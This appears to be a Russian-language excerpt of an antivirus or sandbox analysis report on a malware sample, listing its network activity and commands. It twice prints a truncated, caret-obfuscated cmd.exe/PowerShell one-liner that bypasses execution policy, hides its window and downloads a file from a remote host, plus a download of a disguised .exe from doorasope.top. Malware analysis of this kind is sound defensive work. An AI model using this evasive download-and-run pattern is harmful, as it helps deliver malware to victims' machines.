Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "powEr^Sh^e^l^L^.E^xe^ -exEC^UTi^OnP^o^l^iCy^ ^B^yp^a^s^S -^NO^p^r^OFi^lE^ -^w^i^n^doWsty^Le Hi^dden^ (nEw-ob^jECT ^Syst^em.n^e^T.^wE^BC^l^Ie^NT^).^Dow^N^LO^AD^F^i^lE('http://w...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "powEr^Sh^e^l^L^.E^xe^ -exEC^UTi^OnP^o^l^iCy^ ^B^yp^a^s^S -^NO^p^r^OFi^lE^ -^w^i^n^doWsty^Le Hi^dden^ (nEw-ob^jECT ^Syst^em.n^e^T.^wE^BC^l^Ie^NT^).^Dow^N^LO^AD^F^i^lE('http://w...' (со скрытым окном)